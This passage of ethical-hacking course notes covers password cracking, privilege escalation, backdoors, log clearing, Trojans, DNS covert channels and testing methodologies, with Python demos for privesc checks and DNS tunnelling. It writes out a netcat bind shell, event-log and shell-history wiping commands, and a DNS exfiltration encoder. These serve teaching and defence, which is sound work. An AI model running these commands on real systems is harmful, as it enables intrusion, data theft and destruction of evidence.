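The mask run tries at most 26·26·10·10 = 67,600 candidates, which is why knowing the structure of a password policy (say, "8 characters, starts with a capital, ends in two digits") shrinks a brute force by orders of magnitude.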
Password Hashing
Algorithm Details
MD5 128-bit hash. Deprecated — collision attacks possible. Still used in
legacy systems.
SHA-1 160-bit hash. Deprecated — broken. Used in older TLS, Git.
SHA-256/512 Secure as general-purpose hashes (SHA-2 family) and used throughout modern systems,
but fast: one unsalted round is a weak password store. Passwords need a salted, slow
KDF (bcrypt, scrypt, Argon2, PBKDF2).
NTLM Windows hash format. Vulnerable to Pass-the-Hash attacks.
bcrypt Password-specific hash with salt + cost factor. Resistant to brute force.
LM Hash Legacy Windows hash (pre-Vista). Extremely weak — password uppercased, padded to 14
characters, split into two 7-character halves that are hashed independently
(effectively two 7-character passwords).
Password Cracking Tools
• Hashcat: GPU-accelerated password recovery. Fastest general-purpose cracker. Supports 300+ hash types.
• John the Ripper: Classic CPU-based cracker. Great for Unix shadow files, ZIP, [Link].
• Ophcrack: Windows password cracker using rainbow tables (LM/NTLM).
• THC Hydra: Online password brute-forcer for SSH, FTP, HTTP, RDP, SMB, [Link].
• Medusa: Fast, parallel online login brute-forcer.
• Online hash lookup databases ([Link]): look up hashes that were cracked before.
Online attacks (Hydra, Medusa) hit the live service and trip lockout policies and alerts; offline attacks
(Hashcat, John) run against captured hashes and are invisible to the target.
▶ 5.4 Privilege Escalation
After gaining initial access (often as a low-privileged user), attackers escalate to admin or root.
Vertical Privilege Escalation
Moving from lower privilege to higher privilege (User → Admin → SYSTEM/Root).
• Exploit Vulnerabilities: Kernel exploits (Dirty Pipe, CVE-2022-0847, on Linux). PrintSpoofer on
Windows is not a kernel bug: it abuses the SeImpersonatePrivilege that service accounts hold.
• Misconfigurations: SUID/SGID binaries, sudo -l to list allowed commands, writable directories on PATH,
cron jobs that run writable scripts.
• Weak Service Permissions: Replace service binaries with malicious ones (on Windows also unquoted
service paths and writable service registry keys).
• DLL Hijacking: Place a malicious DLL where a privileged application searches before the real one.
• Token Impersonation: Use Incognito/Metasploit to steal and impersonate tokens of logged-on
privileged users.
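The misconfiguration hunt above as a worked example, added here and not part of the original notes: finding setuid binaries under a root (what find / -perm -4000 does), spotting PATH directories the current user can write to, and flagging risky sudo -l rules. The directory tree, file names and sudo -l output are constructed; the shell-escape list is a small hand-picked set in the style of GTFOBins, not an exhaustive one.

```python
"""Linux privesc misconfiguration checks: SUID binaries, writable PATH dirs, risky sudo rules."""
import os
import re
import stat
import tempfile


def find_suid_binaries(root: str) -> list:
    """Walk `root` and return regular files with the setuid bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)                      # do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def writable_path_dirs(path_env: str) -> list:
    """Directories in a PATH string the current user can write to. A binary
    dropped there shadows commands run by any privileged script trusting PATH."""
    return [d for d in path_env.split(":") if d and os.path.isdir(d) and os.access(d, os.W_OK)]


SUDO_RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")
SHELL_ESCAPES = {"vim", "vi", "nano", "less", "more", "man", "find", "awk",
                 "perl", "python", "python3", "bash", "sh", "env"}      # hand-picked, GTFOBins-style


def risky_sudo_entries(sudo_l_output: str) -> list:
    """Flag sudo -l rules that hand over root: ALL, NOPASSWD, or a binary with a shell escape."""
    out = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE_RE.match(line)
        if not m:
            continue                                      # header or Defaults line
        cmd = m.group("cmd")
        reasons = []
        if cmd == "ALL":
            reasons.append("any command")
        if "NOPASSWD" in m.group("tags"):
            reasons.append("no password")
        if os.path.basename(cmd.split()[0]) in SHELL_ESCAPES:
            reasons.append("shell escape")
        if reasons:
            out.append({"runas": m.group("runas"), "command": cmd, "reasons": reasons})
    return out


# Constructed sudo -l output (hostnames, users and rules are made up).
SUDO_L_SAMPLE = """\
Matching Defaults entries for alice on web01:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
    (ALL : ALL) ALL
"""


def build_demo_tree():
    """Constructed filesystem: one setuid binary and one normal one (invented names).
    Returns (root, bin_dir)."""
    root = tempfile.mkdtemp(prefix="privesc-demo-")
    bin_dir = os.path.join(root, "usr", "local", "bin")
    os.makedirs(bin_dir)
    for name, mode in (("backupctl", 0o4755), ("normaltool", 0o755)):
        path = os.path.join(bin_dir, name)
        with open(path, "w") as f:
            f.write("#!/bin/sh\nexit 0\n")
        os.chmod(path, mode)
    return root, bin_dir


if __name__ == "__main__":
    root, bin_dir = build_demo_tree()
    print("setuid binaries:", find_suid_binaries(root))
    print("writable PATH dirs:", writable_path_dirs(bin_dir + ":/usr/bin"))
    for entry in risky_sudo_entries(SUDO_L_SAMPLE):
        print("sudo:", entry)
```

On a real host the interesting setuid hits are the ones that are not stock (compare against the package manager's file list), and a writable PATH directory only matters if a higher-privileged process actually resolves commands through it.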
Horizontal Privilege Escalation
Accessing another user's account at the same privilege level.
• Session Hijacking: Steal session cookies to act as another user.
• IDOR (Insecure Direct Object Reference): Manipulate user or object IDs in requests to read or modify
another user's data.
▶ 5.5 Maintaining Access
Backdoor Creation
• Netcat Backdoor: nc -lvp 4444 -e /bin/bash → Bind shell on port 4444 (many netcat builds omit -e;
attackers then use a reverse shell instead). A bind shell is a listening port and shows up in netstat/ss.
• Metasploit Meterpreter: Advanced in-memory backdoor with keylogging, screenshot, and pivoting
capabilities.
• Web Shell: PHP/ASP shell uploaded to the web server (e.g., [Link], b374k); runs as the web server's
account.
Rootkits
A rootkit is malicious software that hides itself and other malware at a deep OS level.
• User-Mode Rootkit: Modifies user-space processes and libraries (e.g., LD_PRELOAD hooks). Easier to detect.
• Kernel-Mode Rootkit: Modifies kernel code or loads a malicious driver/module. Very stealthy, hard to detect.
• Bootkit: Infects the MBR or UEFI firmware. Survives OS reinstallation.
• Hypervisor Rootkit: Runs below the OS — slips a thin virtual machine layer under it (Blue Pill
technique).
• Detection: rootkit hunters (rkhunter, chkrootkit), integrity checkers, memory forensics, and comparing
the view from inside the host with an offline or out-of-band view of the same disk.
▶ 5.6 Covering Tracks
Log Manipulation
• Windows: Clear Event Viewer logs — wevtutil cl System / Security / Application. Clearing the Security
log itself writes Event ID 1102 (104 for the System log), so defenders alert on exactly those events.
• Linux: Modify /var/log/[Link], /var/log/syslog, ~/.bash_history → echo '' > ~/.bash_history (or unset
HISTFILE before the session so nothing is written).
• Disable Logging: Stop the Windows Event Log service; modify the syslog configuration. Forwarding logs
to a remote collector as they are written defeats all of these.
File Hiding Techniques
• NTFS ADS (Alternate Data Streams): Hide files in NTFS alternate streams — e.g., [Link]:[Link]
(file:stream syntax; dir /r lists them).
• Steganography: Hide data inside images, audio, or video files (steghide, OpenStego).
• Rootkit File Hiding: Kernel-level hooks intercept file system calls to exclude malicious files from
listings.
UNIT 6: Trojans and Backdoors
▶ 6.1 What is a Trojan?
A Trojan (or Trojan Horse) is malicious software disguised as legitimate software. Unlike viruses,
Trojans do not self-replicate. They rely on social engineering to trick users into installing them. Once
active, they give attackers unauthorized remote access.
Origin Named after the Trojan Horse from Greek mythology — soldiers hidden
inside a gift to enemy city.
▶ 6.2 Types of Trojans
Trojan Type Description
Remote Access Trojan (RAT) Gives attacker full remote control: keylogging, webcam, file
access, shell. Examples: DarkComet, njRAT, Poison Ivy.
Backdoor Trojan Opens a secret port/channel for persistent remote access.
Example: NetBus, Back Orifice.
Downloader Trojan Downloads and installs additional malware once inside the
system.
Banker Trojan Targets online banking credentials — intercepts web forms,
2FA. Example: Zeus, TrickBot.
Rootkit Trojan Embeds rootkit alongside Trojan for deep system hiding and
persistence.
Data-Sending Trojan Silently exfiltrates files, screenshots, keystrokes to attacker's
C2 server.
Destructive Trojan Deletes files, corrupts data, formats drives. Example: NotPetya.
Proxy Trojan Turns victim machine into a proxy server to route attacker's
traffic anonymously.
FTP Trojan Opens FTP port on victim machine for file upload/download.
Security Software Disabler Disables antivirus, firewall, intrusion detection systems.
▶ 6.3 Trojan Communication
Command & Control (C2/C&C) Infrastructure
Trojans communicate with attacker's C2 server to receive commands and send stolen data.
• HTTP/HTTPS C2: Blends with normal web traffic; may hide behind legitimate domains (domain fronting).
• DNS C2: Encodes commands and data in DNS queries and responses — very stealthy (DNS tunneling).
• IRC/XMPP: Uses chat protocols as command channels.
• P2P C2: Decentralized — no single takedown point. Example: ZeroAccess botnet.
• Social Media C2: Commands embedded in Twitter/Facebook posts — legitimate platform, hard to block.
Overt vs Covert Channels
• Overt Channel: Authorized communication path (normal network traffic).
• Covert Channel: Secret, unauthorized communication path hidden inside an overt channel.
◦ Timing Channel: Information encoded in the timing of packets.
◦ Storage Channel: Data hidden in unused header fields, DNS query names, HTTP headers.
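The DNS storage channel from the C2 list and the covert-channel definitions above as one worked example, added here and not part of the original notes: the attacker side packs data into query names (base32 labels within DNS length limits) and unpacks it as the authoritative server would, and the defender side scores names with the length, label-count and entropy heuristics a DNS-tunnel detector uses. The domain, payload and benign query names are constructed.

```python
"""DNS covert (storage) channel: encode data into query names, decode it, and flag it."""
import base64
import collections
import math
import os


def encode_queries(data: bytes, domain: str, payload_chars: int = 120, label_len: int = 60) -> list:
    """Split base32(data) across DNS labels (max 63 chars) and names (max 253 chars).
    Each query starts with a sequence label so the receiver can reorder it."""
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    queries = []
    for seq, start in enumerate(range(0, len(b32), payload_chars)):
        chunk = b32[start:start + payload_chars]
        labels = [chunk[i:i + label_len] for i in range(0, len(chunk), label_len)]
        name = ".".join([str(seq), *labels, domain])
        if len(name) > 253 or any(len(l) > 63 for l in labels):
            raise ValueError("query name would exceed DNS limits")
        queries.append(name)
    return queries


def decode_queries(queries, domain: str) -> bytes:
    """Receiver side (the attacker's authoritative server for `domain`):
    strip the domain, reorder by sequence, re-pad and decode."""
    suffix = "." + domain
    parts = []
    for q in queries:
        if not q.endswith(suffix):
            raise ValueError(f"unexpected query: {q}")
        seq, *labels = q[:-len(suffix)].split(".")
        parts.append((int(seq), "".join(labels)))
    text = "".join(p for _, p in sorted(parts)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking labels sit near the alphabet's maximum."""
    if not s:
        return 0.0
    counts = collections.Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def is_suspicious(name: str):
    """Defender heuristic: tunnelled names are long, stack several labels below
    the registered domain, and carry near-random content. Returns (flag, score).
    Assumes the registered domain is the last two labels."""
    labels = name.rstrip(".").split(".")
    sub = ".".join(labels[:-2])
    score = (int(len(sub) > 40)
             + int(shannon_entropy(sub.replace(".", "")) > 3.5)
             + int(len(labels) - 2 >= 3))
    return score >= 2, score


def random_tunnel_queries(n_bytes: int = 200, domain: str = "t.example") -> list:
    """Constructed tunnel traffic: random bytes, as an encrypted payload would look."""
    return encode_queries(os.urandom(n_bytes), domain)


# Constructed benign names for comparison.
NORMAL_QUERIES = ["www.google.com", "mail.target.example",
                  "api.v2.cdn.example.net", "d1a2b3c4e5f6.cloudfront.net"]


if __name__ == "__main__":
    payload = b"exfil: user=alice pass=hunter2"
    for q in encode_queries(payload, "t.example"):
        print(q, is_suspicious(q))
    for q in NORMAL_QUERIES:
        print(q, is_suspicious(q))
```

The heuristic is deliberately simple: a single CDN hostname can trip one of the three tests, which is why production detectors also count distinct subdomains per registered domain per client over time, and why the channel above is "stealthy" only relative to a network that does not inspect DNS at all.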
▶ 6.4 Trojan Construction & Delivery
Wrapping/Binding Techniques
• Wrapper/Binder: Combine the Trojan with a legitimate file into a single executable. Example: SFX
archives, [Link].
• File Extension Spoofing: Rename [Link] to [Link] — a double extension such as name.pdf.exe shows as
name.pdf when Windows hides known extensions.
• Icon Spoofing: Use a legitimate application's icon to appear harmless.
Delivery Methods
• Spear Phishing: Malicious attachment or link in a targeted email.
• Drive-by Download: Visiting a compromised website triggers an automatic download.
• Software Bundling: Hidden in pirated software, cracked games, fake updates.
• USB Drops: Infected USB left in a parking lot for curious employees.
• Social Engineering: Convincing the victim to run the file manually.
• Watering Hole: Compromise a website frequently visited by the target group.
▶ 6.5 Trojan Detection & Prevention
Detection Methods
• Antivirus/EDR: Signature-based and behavioral detection.
• Network Monitoring: Detect unusual outbound connections, high traffic, beaconing at fixed intervals,
unknown C2 domains.
• Process Monitoring: Identify suspicious processes and unusual parent-child relationships (e.g., an
Office application spawning a shell).
• Integrity Checking: Tripwire, AIDE — detect file system changes.
• Sandbox Analysis: Detonate suspicious files in an isolated environment (Cuckoo Sandbox, [Link]).
Prevention
• Principle of Least Privilege: Limit user permissions — a Trojan can only do what the user who ran it
can do.
• Application Whitelisting: Only allow approved applications to run.
• Email Filtering: Block executable attachments, scan attachments.
• User Education: Train users to recognize phishing and social engineering.
• Regular Patching: Eliminate the vulnerabilities Trojans exploit for installation.
UNIT 7: Black Box vs White Box Techniques
▶ 7.1 Overview of Testing Methodologies
In penetration testing and ethical hacking, the amount of information provided to the tester before the
engagement defines the testing methodology. These methodologies represent different threat models
and testing scenarios.
▶ 7.2 Black Box Testing
In Black Box testing, the tester has NO prior knowledge of the internal structure, architecture, or source
code of the target system. The tester simulates an external attacker with zero insider knowledge.
Characteristics
• No access to source code, architecture diagrams, or internal documentation.
• Tester only knows the target's IP/domain — simulates real-world attacker.
• Focuses on externally visible attack surface.
• Also known as: Zero-Knowledge Testing, Closed-Box Testing; often equated with External Testing,
although an external test can be run at any knowledge level.
Black Box Testing Process
◦ Footprinting: OSINT, WHOIS, DNS enumeration, Google dorking.
◦ Scanning: Nmap port scans, banner grabbing, vulnerability scanning.
◦ Enumeration: SMB, SNMP, LDAP enumeration.
◦ Exploitation: Test discovered vulnerabilities with available exploits.
◦ Reporting: Document all findings, attack vectors, and recommendations.
Advantages of Black Box
• Most realistic simulation of an external cyberattack.
• No bias from knowledge of system internals.
• Tests effectiveness of perimeter defenses and detection capabilities.
• Uncovers vulnerabilities from attacker's perspective.
Disadvantages of Black Box
• Time-consuming — significant effort spent on reconnaissance.
• May miss internal vulnerabilities (insider threats, internal network issues).
• Results depend heavily on tester's skill and available time.
• Less comprehensive code-level analysis.
▶ 7.3 White Box Testing
In White Box testing (also called Clear Box or Glass Box testing), the tester has COMPLETE
knowledge of the internal system — including source code, architecture, network diagrams, credentials,
and configuration files.
Characteristics
• Full access to: source code, database schemas, network topology, API documentation.
• Simulates an insider threat or a developer reviewing their own code.
• Most thorough and comprehensive testing approach.
• Also known as: Internal Testing, Full-Knowledge Testing, Clear Box, Crystal Box.
White Box Testing Process
◦ Code Review: Static analysis — review source code for logic flaws, injection points,
hardcoded secrets.
◦ Architecture Review: Examine network design, trust boundaries, data flow diagrams.
◦ Configuration Review: Check server configs, firewall rules, ACLs, RBAC settings.
◦ Dynamic Analysis: Run the application with knowledge of internals — targeted testing.
◦ Vulnerability Verification: Confirm all known issues and discover new ones.
Advantages of White Box
• Most thorough — can find vulnerabilities deep in the codebase.
• Efficient — no time wasted on reconnaissance.
• Can test specific functions, modules, and logic paths.
• Excellent for SDLC integration (Security Development Lifecycle).
Disadvantages of White Box
• Time-consuming for large codebases.
• Tester bias — may assume certain inputs won't occur.
• Does not accurately simulate real attacker perspective.
• Requires specialized skills (code review, SAST tools).
▶ 7.4 Grey Box Testing
Grey Box testing is a combination — tester has partial knowledge of the internal system. It balances
realism with efficiency.
• Tester may have: login credentials, partial network diagrams, API documentation.
• Simulates: Compromised insider, partner/vendor with limited access.
• Best balance of thoroughness and realism in most real-world engagements.
▶ 7.5 Comparison Table
Factor Black Box | Grey Box | White Box
Knowledge Level None (0%) | Partial (50%) | Complete (100%)
Testing Perspective External Attacker | Insider / Partner | Developer / Auditor
Time Required High (recon-heavy) | Medium | Low to Medium
Comprehensiveness Low to Medium | Medium to High | Highest
Code Analysis No | Limited | Full (SAST, DAST)
Realism of Attack Sim Highest | High | Lower
Best For External perimeter test | Application testing | SDLC / Compliance audits
Threat Model External adversary | Privileged insider | Developer/QA
Tools Used Nmap, Metasploit, OSINT | Both + Burp Suite | SAST tools, code review
Cost High (time) | Medium | Can be high (expertise)
▶ 7.6 When to Use Which Approach
Use Black Box when:
• You want to test your external attack surface as a real hacker sees it.
• Measuring effectiveness of perimeter security and detection tools (SOC/IDS/IPS).
• Compliance requirements mandate an external perspective assessment.
Use White Box when:
• Conducting a thorough security audit of your own software before release.
• Integrating security testing into the SDLC (DevSecOps).
• Investigating a specific suspected vulnerability in code.
• Compliance: PCI-DSS, SOC2, HIPAA code security requirements.
Use Grey Box when:
• Testing a web application — have login credentials but not source code.
• Simulating a compromised user or low-level insider threat.
• Time-constrained engagement needing balance of coverage and realism.
QUICK REVISION SUMMARY
Topic Key Points to Remember
Ethical Hacking Legal, authorized penetration testing. White/Black/Grey hat. 5
CEH phases.
Hacking Methodology Recon → Scanning → Gaining Access → Maintaining Access →
Covering Tracks.
Malicious Hacking Same methodology, criminal intent, no authorization, data theft &
destruction.
Footprinting Passive (OSINT, WHOIS, DNS) + Active (direct interaction).
Tools: Maltego, theHarvester, Recon-ng.
Scanning Port scanning (Nmap), banner grabbing, vulnerability scanning.
SYN scan = half-open, not logged by the application; idle scan hides the
attacker's IP.
Enumeration Extract real data: users, shares, policies. NetBIOS(137),
SNMP(161), LDAP(389), SMB(445).
System Hacking Password cracking → Privilege Escalation → Backdoors →
Rootkits → Cover Tracks.
Trojans Disguised malware. Types: RAT, Banker, Rootkit, Downloader.
C2 via HTTP/DNS.
Black Box Zero knowledge. Most realistic. External attacker simulation.
Time-intensive.
White Box Full knowledge. Most thorough. Includes code review. Best for
SDLC/compliance.
Grey Box Partial knowledge. Balanced approach. Most common in real
engagements.
Study Tip: Ethics First!
Always remember: Ethical hacking requires explicit written permission. Using these techniques without
authorization is illegal under computer crime laws worldwide.